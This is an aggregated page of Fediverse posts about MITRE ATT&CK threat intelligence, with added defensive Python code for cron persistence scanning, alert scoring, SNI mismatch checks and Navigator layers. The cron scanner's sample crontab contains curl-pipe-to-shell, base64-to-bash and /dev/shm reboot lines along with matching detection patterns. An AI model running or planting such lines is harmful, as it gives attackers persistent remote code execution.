#mitreattack — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #mitreattack, aggregated by home.social.
-
Learn How Malware Survives Reboots and Cleanup Using Cron Persistence Technique in Linux Systems.
Full Details Here: https://ostechnix.com/cron-persistence-linux-malware/
#CronPersistence #Malware #Cronjob #Cron #LinuxSecurity #MitreAttack #Linux
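An added check to go with the post above (example code written for this page, not from the linked ostechnix article): it scans crontab text for the indicators that typically accompany cron-based persistence, such as @reboot triggers, re-downloading a payload with curl or wget, base64-wrapped commands, staging under /tmp or /dev/shm, and piping content straight into a shell. The sample crontab and the indicator set are constructed assumptions; the scan_host() helper reads the standard Debian and RHEL cron locations and needs root to see per-user spools.

```python
import re
from pathlib import Path

# Constructed sample crontab text for the demo; not taken from a real host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://198.51.100.7/x.sh | sh
@reboot /dev/shm/.x/run
0 0 * * 0 echo aGVsbG8= | base64 -d | bash
"""

# Heuristic indicators of cron-based persistence (assumed starting set; tune for your fleet).
INDICATORS = {
    "reboot_trigger":  re.compile(r"^\s*@reboot\b"),                # survives reboots by design
    "remote_fetch":    re.compile(r"\b(curl|wget)\b"),              # re-downloads payload after cleanup
    "encoded_payload": re.compile(r"\bbase64\b"),                   # obfuscated command line
    "tmp_location":    re.compile(r"(/tmp/|/dev/shm/|/var/tmp/)"),  # world-writable staging dirs
    "pipe_to_shell":   re.compile(r"\|\s*(ba|z)?sh\b"),             # content piped straight into a shell
}

# Standard system and per-user cron locations (Debian and RHEL layouts).
CRON_PATHS = [
    "/etc/crontab", "/etc/cron.d",
    "/var/spool/cron/crontabs", "/var/spool/cron",
    "/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly",
]


def flag_cron_text(text, source="<text>"):
    """Return one hit per non-comment line that matches at least one indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        matched = [name for name, rx in INDICATORS.items() if rx.search(line)]
        if matched:
            hits.append({"source": source, "line": lineno,
                         "indicators": matched, "entry": line})
    return hits


def scan_host(paths=CRON_PATHS):
    """Walk the cron locations (files and one-level directories) and collect hits."""
    hits = []
    for p in paths:
        path = Path(p)
        if path.is_file():
            files = [path]
        elif path.is_dir():
            files = sorted(f for f in path.iterdir() if f.is_file())
        else:
            continue
        for f in files:
            try:
                hits.extend(flag_cron_text(f.read_text(errors="replace"), str(f)))
            except OSError:
                pass  # per-user spools are root-only; run as root for full coverage
    return hits


if __name__ == "__main__":
    for h in flag_cron_text(SAMPLE_CRONTAB, "sample") + scan_host():
        print(f"{h['source']}:{h['line']} {','.join(h['indicators'])}  {h['entry']}")
```

A clean scan is not proof of absence: the same heuristics miss a job that simply runs a benign-looking path the attacker controls, so diff the cron files against a known-good baseline as well, and remember that systemd timers and at jobs are the sibling persistence locations this check does not cover.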
-
Red and blue teams breaking down their silos and working in real time—imagine a cybersecurity defense that evolves with every simulated threat. Curious how continuous purple teaming is rewriting the playbook?
#purpleteaming
#cyberdefense
#breachandattacksimulation
#mitreattack
#redteam
#blueteam
#securityautomation
#continuousvalidation
#cybersecuritystrategy
-
🚀 MITRE ATT&CK v18 = a major leap in detection depth.
The new version adds Detection Strategies and Analytics - helping defenders align detection logic to platform-specific threats.
Also new: CI/CD, Kubernetes, ransomware prep behaviors, mobile “linked devices” exploits, and ICS asset updates.
MITRE even launched the ATT&CK Advisory Council to strengthen community collaboration.
💬 What part of ATT&CK v18 do you think will have the biggest impact on detection engineering?
Follow @technadu for more #ThreatIntel insights. #CyberSecurity #MITREATTACK #DetectionEngineering #CTI #ThreatIntel #BlueTeam #Infosec #CyberDefense #MITRE #ICS #CloudSecurity #MobileSecurity
-
I'm just working on a #ThreatModeling workshop with #EoP and I just wondered, is there an equivalent of Threat Modeling for IT? You could use #MitreAttack for something similar but I'm missing the cooperative teamwork of EoP
#CyberSecurity
Do you know about a similar technique, methodology, ... with a focus on IT? Please let me know what you use
-
SIEM 4.0: The Essentialist Evolution: https://jacknaglieri.substack.com/p/gen-4-siem
What to expect in SIEM 4.0:
- Prioritizing impactful MITRE tactics rather than complete ATT&CK coverage.
- Shifting from atomics to risk-based alerts that analyze groups of actions.
- Opening up the data lake and introducing new criteria for open data platforms.
- Controlling low-quality alerts through the adoption of “as code” principles.
- Using AI to automate routine tasks so that humans can focus on high-value work.
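The second bullet above, "risk-based alerts that analyze groups of actions", in working form (an added example for this page, not code from the linked article): atomic detections already mapped to ATT&CK techniques are grouped per host into one-hour windows, each technique is counted once per window, the window is scored by tactic weight, and only a window whose total crosses the threshold becomes an alert. The sample events, the tactic weights and the threshold are constructed assumptions; the weights are where the "impactful tactics first" priority from the first bullet is expressed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample atomic detections (not real telemetry): one ATT&CK-mapped observation each.
ATOMICS = [
    {"ts": "2024-03-01T09:00:00", "host": "ws-017", "technique": "T1566.001", "tactic": "initial-access"},
    {"ts": "2024-03-01T09:02:10", "host": "ws-017", "technique": "T1059.001", "tactic": "execution"},
    {"ts": "2024-03-01T09:05:40", "host": "ws-017", "technique": "T1003.001", "tactic": "credential-access"},
    {"ts": "2024-03-01T09:06:00", "host": "ws-017", "technique": "T1059.001", "tactic": "execution"},
    {"ts": "2024-03-01T09:08:30", "host": "ws-017", "technique": "T1021.002", "tactic": "lateral-movement"},
    {"ts": "2024-03-01T11:30:00", "host": "ws-042", "technique": "T1059.001", "tactic": "execution"},
    {"ts": "2024-03-02T08:00:00", "host": "ws-042", "technique": "T1059.001", "tactic": "execution"},
]

# Assumed tactic weights encoding the "impactful tactics first" priority; not a MITRE-published scale.
TACTIC_WEIGHT = {
    "initial-access": 10, "execution": 5, "persistence": 15, "credential-access": 30,
    "lateral-movement": 25, "exfiltration": 40, "impact": 50,
}
ALERT_THRESHOLD = 50
WINDOW = timedelta(hours=1)


def group_by_window(events, window):
    """Split a host's time-ordered events into groups that start within `window` of the first event."""
    groups, current = [], []
    for ev in events:
        t = datetime.fromisoformat(ev["ts"])
        if current and t - datetime.fromisoformat(current[0]["ts"]) > window:
            groups.append(current)
            current = []
        current.append(ev)
    if current:
        groups.append(current)
    return groups


def score_hosts(atomics, window=WINDOW, threshold=ALERT_THRESHOLD, weights=TACTIC_WEIGHT):
    """Risk-based alerting: aggregate atomic hits per host and window, count each technique once,
    weight by tactic, and return only windows whose total crosses the threshold."""
    by_host = defaultdict(list)
    for a in sorted(atomics, key=lambda a: a["ts"]):   # ISO-8601 strings sort chronologically
        by_host[a["host"]].append(a)
    alerts = {}
    for host, events in by_host.items():
        for group in group_by_window(events, window):
            distinct = {ev["technique"]: ev["tactic"] for ev in group}   # dedupe repeated atomics
            score = sum(weights.get(tac, 1) for tac in distinct.values())
            if score >= threshold:
                alerts.setdefault(host, []).append({
                    "window_start": group[0]["ts"],
                    "score": score,
                    "techniques": sorted(distinct),
                })
    return alerts


if __name__ == "__main__":
    for host, windows in score_hosts(ATOMICS).items():
        for w in windows:
            print(f"{host} {w['window_start']} score={w['score']} {w['techniques']}")
```

With the sample data, ws-017 produces one alert (phishing, PowerShell, LSASS access and SMB lateral movement inside ten minutes score 70), while ws-042's two isolated PowerShell executions never exceed 5 and stay silent; that is the whole point of grouping actions rather than paging on each atomic.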
-
Trend Micro reports on a new China-nexus cyberespionage group (dubbed Earth Krahang) that primarily targets Southeast Asia and then Europe, America, and Africa. It has multiple connections to another Chinese APT Earth Lusca (aka Aquatic Panda, Bronze University, Charcoal Typhoon, RedHotel) and potential links to i-SOON. Trend Micro was able to retrieve multiple files from Earth Krahang’s servers, including samples, configuration files, and log files from its attack tools. MITRE ATT&CK TTPs and IOCs provided. 🔗 https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html
#EarthKrahang #cyberespionage #EarthLusca #AquaticPanda #CharcoalTyphoon #RedHotel #China #APT #IOC #threatintel #MITREATTACK
-
📢 Attention, threat hunters! We're thrilled to present an exclusive training session at #BlackHatAsia2024 titled "Beyond IOCs: How to Effectively Threat Hunt Using TTPs and Behaviors," a virtual masterclass led by Lee Archinal from Cyborg Security. Don't miss this opportunity—grab the early-bird pricing before March 1, 2024!
🔗 Secure your spot at the early-bird rate by registering before March 1: https://lnkd.in/g2Wh3Pyg
#cybersecuritytraining #threatdetection #blackhatasia #TTPsNotIOCs #behavioralthreathunting #securityoperations #cybersecurityprofessionals #mitreattack #cybersecurity #cybersecurityskills #threathunting
-
"🚨 CVE-2023-28807 - Domain Fronting Evasion in ZIA 🚨"
An evasion technique identified as CVE-2023-28807, allows attackers to bypass Zscaler Internet Access (ZIA)'s domain fronting detection by exploiting a mismatch between Connect Host and Server Name Indication (SNI) in Client Hello messages. The vulnerability exploits how ZIA handles the SNI field during the TLS handshake process. The SNI is intended to indicate which host the client wants to connect to within a shared hosting environment, allowing the server to present the correct certificate for that host. However, due to this vulnerability, an attacker can manipulate the SNI in such a way that the security mechanisms fail to correctly identify and filter malicious traffic, enabling the attacker to hide malicious activities within what appears to be legitimate traffic.
This vulnerability was discovered and addressed by Zscaler. Users are urged to upgrade to version 6.2r.290 to mitigate this risk. 🛡️💻🔐 Tags: #Cybersecurity #CVE2023 #DomainFronting #Zscaler #NetworkSecurity #EvasionTechniques #MITREATTACK MITRE - T1587.003 🌍🔒🔍
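The check the post describes, a comparison of the proxy CONNECT target with the SNI inside the client's TLS ClientHello, as an added example written for this page (not Zscaler's code, and not derived from the CVE advisory): extract_sni() walks the record, handshake header, ClientHello body and extension list to the server_name extension (RFC 6066), and check_fronting() reports match, mismatch or no_sni. The build_client_hello() helper only exists to construct sample input offline; real traffic is read from the first bytes the client sends after CONNECT succeeds. In ATT&CK's own taxonomy this behaviour lives under Proxy: Domain Fronting, T1090.004.

```python
import struct

SNI_EXTENSION = 0x0000  # TLS server_name extension type (RFC 6066)


def build_client_hello(sni: str) -> bytes:
    """Constructed minimal TLS 1.2 ClientHello carrying one SNI entry (sample input only)."""
    host = sni.encode("ascii")
    name_entry = b"\x00" + struct.pack("!H", len(host)) + host      # name_type=host_name
    sni_body = struct.pack("!H", len(name_entry)) + name_entry
    ext = struct.pack("!HH", SNI_EXTENSION, len(sni_body)) + sni_body
    body = (b"\x03\x03" + b"\x00" * 32 + b"\x00"                      # version, random, empty session id
            + struct.pack("!H", 2) + b"\xc0\x2f"                      # one cipher suite
            + b"\x01\x00"                                             # null compression only
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body     # client_hello, 24-bit length
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes):
    """Parse a TLS record holding a ClientHello and return the SNI host name, or None."""
    try:
        if len(record) < 9 or record[0] != 0x16 or record[5] != 0x01:
            return None
        hs_len = int.from_bytes(record[6:9], "big")
        body = record[9:9 + hs_len]
        pos = 2 + 32                                            # skip client_version + random
        pos += 1 + body[pos]                                    # session_id
        pos += 2 + int.from_bytes(body[pos:pos + 2], "big")     # cipher_suites
        pos += 1 + body[pos]                                    # compression_methods
        if pos + 2 > len(body):
            return None                                         # no extensions block at all
        end = pos + 2 + int.from_bytes(body[pos:pos + 2], "big")
        pos += 2
        while pos + 4 <= end:
            etype = int.from_bytes(body[pos:pos + 2], "big")
            elen = int.from_bytes(body[pos + 2:pos + 4], "big")
            edata = body[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            if etype != SNI_EXTENSION:
                continue
            q = 2                                               # skip server_name_list length
            while q + 3 <= len(edata):
                ntype, nlen = edata[q], int.from_bytes(edata[q + 1:q + 3], "big")
                name = edata[q + 3:q + 3 + nlen]
                q += 3 + nlen
                if ntype == 0:                                  # host_name entry
                    return name.decode("ascii", errors="replace")
        return None
    except IndexError:
        return None                                             # truncated or malformed hello


def _host_only(authority: str) -> str:
    """Strip the port from a CONNECT authority ('host:443' or '[v6]:443')."""
    if authority.startswith("["):
        return authority[1:authority.index("]")]
    return authority.rsplit(":", 1)[0] if ":" in authority else authority


def check_fronting(connect_host: str, client_hello: bytes) -> dict:
    """Compare the proxy CONNECT target with the SNI the client actually sends."""
    sni = extract_sni(client_hello)
    chost = _host_only(connect_host).lower().rstrip(".")
    if sni is None:
        verdict = "no_sni"          # cannot compare; a policy decision, not an automatic pass
    elif sni.lower().rstrip(".") == chost:
        verdict = "match"
    else:
        verdict = "mismatch"        # fronting-style split between outer and inner host
    return {"connect_host": chost, "sni": sni, "verdict": verdict}
```

Two caveats for anyone wiring this into an inspection point: a missing SNI must not silently count as a match, and the CONNECT host is only the first of the three names that should agree (CONNECT host, SNI, and the HTTP Host header or :authority inside the tunnel); the last of those is only visible if the proxy terminates TLS.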
-
This morning, we're thrilled to publish the @tidalcyber Ultimate Guide to Cyber Threat Profiling. At 57 pages of workflows, tips, resources, and infographics, I’m out of many more words to add here – check it out and let us know what you think!
#threatprofile #threatinformeddefense #mitreattack #DiamondModel #TTP #APT #ransomware #risk #cyber
-
Introducing the newest major @tidalcyber TTP intelligence content roundup, the Initial Access & Malware Delivery Landscape matrix, now live in our free Community Edition platform: https://app.tidalcyber.com/share/43836024-a194-4ac7-9659-b51e88632e7f
The matrix covers 25 major & emerging #malware typically used to gain early footholds in victim environments, often leading to ingress of more impactful threats, especially #ransomware, #infostealers, cryptominers, & more. It includes many recognizable names (#QakBot, #IcedID, #Emotet, #Bumblebee, #Gootloader) plus several newer and less-discussed threats
The matrix includes 13 custom Technique Sets for threats not currently tracked in the #mitreattack knowledge base. All technique references derive from a large volume of recent, public #threat reporting (click the labels in the ribbon at the top of the matrix to view relevant source URLs for each threat)
An interactive link analysis visualization of connections among these threats, also derived from public reports, is also available here: https://onodo.org/visualizations/235067/
Community Edition matrices support easy identification of shared (and outlier) techniques among multiple threats, and quick & easy overlay or pivoting to defensive & offensive security capabilities relevant to your own #security stack. We’ll have a blog out soon reviewing our analysis of top & trending techniques common among these initial access threats
Tidal’s #Adversary Intelligence team remains focused on providing up-to-date #TTPintelligence, especially around traditionally under-represented yet widely relevant threats like crimeware. Other popular matrices in this theme include our Ransomware & Data Extortion Landscape matrix (https://app.tidalcyber.com/share/9a0fd4e6-1daf-4f98-a91d-b73003eb2d6a) and Major & Emerging Infostealers matrix (https://app.tidalcyber.com/share/ec62f5e0-bd40-476b-a560-7ad2779ea9e3), which each cover 20+ threats
Financially motivated adversaries often display a rapid pace of #TTP evolution, and this is especially apparent for #initialaccess threats. Register for our webinar on May 31 dedicated to TTP evolution, its drivers, and discussion around what defenders can do to address it and its implications: https://hubs.la/Q01NC23k0
#SharedWithTidal #threatinformeddefense #malware #infostealer #cryptominer #IAB #blueteam #detectionengineering #purpleteam #cyber
-
#Gootloader is a highly active banking Trojan-turned-loader #malware that has recently appeared on multiple vendors’ priority threat lists, attacking organizations in a wide range of verticals & countries. If your leadership or other stakeholders asked for a list of this threat's most common TTPs, would you be able to provide it quickly?
Now you can, with the Gootloader #TTP matrix available in Tidal’s free Community Edition: https://app.tidalcyber.com/share/796cacb6-3bb1-474b-9747-abcce2c47de2
Gootloader, also referred to by its related payload, #Gootkit, first emerged in 2014 but has been especially active since 2020. Despite this, technical reporting around its TTPs has been relatively light until even more recently. In the past two years alone, verticals including finance, #healthcare, defense, pharmaceutical, energy, & automotive have faced Gootloader campaigns, with victims across North America, Western Europe, & South Korea, and the malware is regularly used to deliver high-impact payloads, including Cobalt Strike, #IcedID (a common #ransomware precursor), & more. Industry-based #threat profiling can be a powerful tool, but even if your industry (or your corner of it) hasn’t yet directly observed Gootloader activity, we believe broad-based threats like this should be on most teams’ radars
Our matrix summarizes Gootloader TTPs detailed across several great recent technical reports. Reports from SentinelLabs, Cybereason, & The DFIR Report were helpfully pre-mapped to #mitreattack, and we mapped a couple other detailed analyses. Procedural details are even available for nearly all the included technique mappings – be sure to click the Technique Set’s label in the ribbon at the top of the screen to pivot into the Details page with this information & relevant source links throughout
Red Canary & The DFIR Report helpfully provided tool-agnostic suggested #detection logic for key behaviors observed during recent Gootloader campaigns here https://redcanary.com/blog/gootloader/ and here https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/. Take a wider view by layering entire segments of your defensive stack over the #CTI back in the Community Edition, by toggling on any of the mappings available in @tidalcyber's Product Registry https://app.tidalcyber.com/vendors
#SharedWithTidal #threatinformeddefense #CobaltStrike #initialaccess #blueteam
-
#Rhadamanthys #stealer seems to be having a moment right now. Quick rundown on what we know about infection trends & its post-exploit TTPs
Discovered last summer, it's one of several popular & emerging #infostealer #malware with new/improved evasion and/or theft capabilities observed in recent months. Like many popular families, Rhadamanthys initial infections occur via multiple vectors, including #phishing & #spam email attachments and - increasingly - legitimate web search ads: https://www.malware-traffic-analysis.net/2023/01/03/index.html, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
In our broad analysis of the infostealer threat landscape, we identified #mitreattack TTPs associated with 16 families across dozens of public reports. We've already added more reported techniques to Rhadamanthys' set since the report dropped this week https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w
Still somewhat limited public reporting on this threat to date, although we've identified 22 (sub-)techniques associated with Rhadamanthys so far. Visualize them and pivot to associated defensive & offensive testing capabilities here: https://app.tidalcyber.com/share/techniqueset/48405ee2-b243-4bda-a6c2-75eb80869056
In addition to the reports above, two other resources here: https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web, https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/. Thanks to the teams that published great reporting & analysis around Rhadamanthys so far, including ThreatMon, Accenture, @malware_traffic & Cyble
-
⚠️ Cuba Ransomware resources drop ⚠️
A new ransomware advisory comes in hot to one of your intelligence channels – what are your next steps? In our latest video, we walk through our approach to a situation like this, which analysts face almost every day amid growing volumes of CTI shared in the community today https://www.youtube.com/watch?v=K1a6Mac1-y4
Link to the latest @CISA @FBI #StopRansomware alert on Cuba Ransomware, published Dec 1 (and updated just yesterday) https://www.cisa.gov/uscert/ncas/alerts/aa22-335a
Past advisories on five other #ransomware highly active in targeting U.S. critical infrastructure – and many other – organizations just this year: https://www.cisa.gov/stopransomware/stopransomware
According to the alert, “Since spring 2022, Cuba ransomware actors have modified their TTPs and tools to interact with compromised networks and extort payments from victims.” We’re likely to see more of this “TTP evolution” theme in 2023. As adversaries continue to evolve their TTPs rapidly and often, we had the chance to write more about this trend on our blog recently: https://www.tidalcyber.com/blog/adversary-ttp-evolution-and-the-value-of-ttp-intelligence
(And here’s another piece covering TTP evolution relative to another top malware, QakBot https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps)
In the walkthrough, we highlight metrics around threats made on ransomware “extortion blogs” as just one public data point around Cuba’s growing threat in recent months. The figures come from this incredible public dataset https://github.com/joshhighet/ransomwatch
The rest of the walkthrough centers on our free Community Edition tool. Jump into it here: https://app.tidalcyber.com/. No registration is required to access a ton of features (including everything shared below) but you know the drill: you’ll ultimately find the most value with a quick email sign-up 📋
#Cuba Ransomware details from #mitreattack https://app.tidalcyber.com/software/095064c6-144e-4935-b878-f82151bc08e4-Cuba
Technique set for Cuba TTPs published in February https://app.tidalcyber.com/share/6fbf994c-d6c9-42fd-8ee9-8954865d6d6f (source: https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware)
Cuba technique set based on CISA’s/FBI’s new alert: https://app.tidalcyber.com/share/11c631bc-be34-463d-9d24-852a6f414b2a
Script to quickly convert techniques & procedures from recent #CTI into a technique “layer” json file: https://github.com/mitre-attack/attack-navigator/blob/master/layers/attack_layers/attack_layers_simple.py
LSASS Memory technique details page, with pivots to aligned defensive capabilities, detection analytics, & tests: https://app.tidalcyber.com/technique/ab0da102-5a14-42b1-969e-5d3daefdf0c5-LSASS%20Memory
Cuba Ransomware report referencing LSASS Memory & Disable or Modify Tools techniques: https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/
Disable or Modify Tools technique details page: https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6-Disable%20or%20Modify%20Tools
Final Cuba Ransomware technique time series comparison/overlay: https://app.tidalcyber.com/share/7631b2a7-2c0d-49ee-ac12-ca9c92ad4a72
Dashboard we’re maintaining covering all TTPs from the #StopRansomware alert series, currently spotlighting six high-priority ransomware and updated each time CISA publishes a new alert: https://app.tidalcyber.com/share/9c1f08a2-b823-4e11-a8a5-01335fb0215e
Join the Tidal Community Slack channel to engage with & learn from others throughout the #threatinformeddefense space https://join.slack.com/t/tidalcommunity/shared_invite/zt-1ljrtdtkm-VGi8fa5VYhLma4o1Vu33nA
Catch this and other walkthroughs on the @tidal Cyber YouTube channel https://www.youtube.com/@tidalcyber6071
#cyberthreatintelligence #cybersecurity #OSINT #SharedWithTidal
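The two steps the walkthrough above links separately, turning technique lists from CTI into a Navigator layer and overlaying an earlier technique set against a later one to see TTP evolution, combined in one added example (written for this page; it is not Tidal's tooling and not the attack_layers_simple.py script from the Navigator repository). The two technique sets are constructed samples and are not the actual mappings from the Mandiant or CISA/FBI Cuba reports, though the IDs are real ATT&CK techniques, including the two the post names (T1003.001 LSASS Memory, T1562.001 Disable or Modify Tools). The layer's score encodes the comparison, and the ATT&CK and Navigator version strings are assumptions to be set to the release you run.

```python
import json

# Constructed sample technique sets for two reports on the same actor (illustrative, NOT the
# actual mappings of the Mandiant or CISA/FBI Cuba reports). Keys are ATT&CK technique IDs.
REPORT_EARLIER = {
    "T1566.001": "spearphishing attachment delivers loader",
    "T1059.001": "PowerShell stager",
    "T1003.001": "LSASS memory dumped for credentials",
    "T1486": "files encrypted for impact",
}
REPORT_LATER = {
    "T1190": "public-facing application exploited for initial access",
    "T1059.001": "PowerShell stager",
    "T1003.001": "LSASS memory dumped for credentials",
    "T1562.001": "security tooling disabled before encryption",
    "T1021.002": "SMB admin shares used for lateral movement",
    "T1486": "files encrypted for impact",
}

# Score legend used in the overlay layer.
RETAINED, ADDED, DROPPED = 2, 1, 0


def compare_technique_sets(earlier, later):
    """Partition technique IDs into retained / dropped / added between two reports."""
    e, l = set(earlier), set(later)
    return {"retained": sorted(e & l), "dropped": sorted(e - l), "added": sorted(l - e)}


def build_overlay_layer(earlier, later, name,
                        attack_version="14", navigator_version="4.9.1", layer_version="4.5"):
    """Emit an ATT&CK Navigator layer dict whose score encodes the comparison.
    The version strings are assumptions: set them to the ATT&CK release and Navigator build you use."""
    diff = compare_technique_sets(earlier, later)
    score_of = {tid: RETAINED for tid in diff["retained"]}
    score_of.update({tid: ADDED for tid in diff["added"]})
    score_of.update({tid: DROPPED for tid in diff["dropped"]})
    techniques = [
        {
            "techniqueID": tid,
            "score": score,
            "comment": later.get(tid) or earlier.get(tid, ""),   # procedure text travels with the cell
            "enabled": True,
            "showSubtechniques": False,
        }
        for tid, score in sorted(score_of.items())
    ]
    return {
        "name": name,
        "versions": {"attack": attack_version, "navigator": navigator_version, "layer": layer_version},
        "domain": "enterprise-attack",
        "description": "Overlay of two reports: 0 = only earlier, 1 = only later, 2 = in both",
        "techniques": techniques,
        "gradient": {"colors": ["#ffe766", "#ff6666", "#8ec843"], "minValue": 0, "maxValue": 2},
        "legendItems": [
            {"label": "dropped (earlier report only)", "color": "#ffe766"},
            {"label": "added (later report only)", "color": "#ff6666"},
            {"label": "retained (both reports)", "color": "#8ec843"},
        ],
    }


def layer_json(earlier, later, name):
    """Serialise the layer for Navigator's Open Existing Layer, Upload from local."""
    return json.dumps(build_overlay_layer(earlier, later, name), indent=2)


if __name__ == "__main__":
    print(layer_json(REPORT_EARLIER, REPORT_LATER, "Cuba TTP overlay (constructed sample)"))
```

The "added" bucket is the one to brief on: with the sample sets it holds T1190, T1021.002 and T1562.001, which is exactly the "modified their TTPs and tools" pattern the CISA/FBI alert quoted above describes, and the dropped bucket should be read as "not reported again", never as "no longer used".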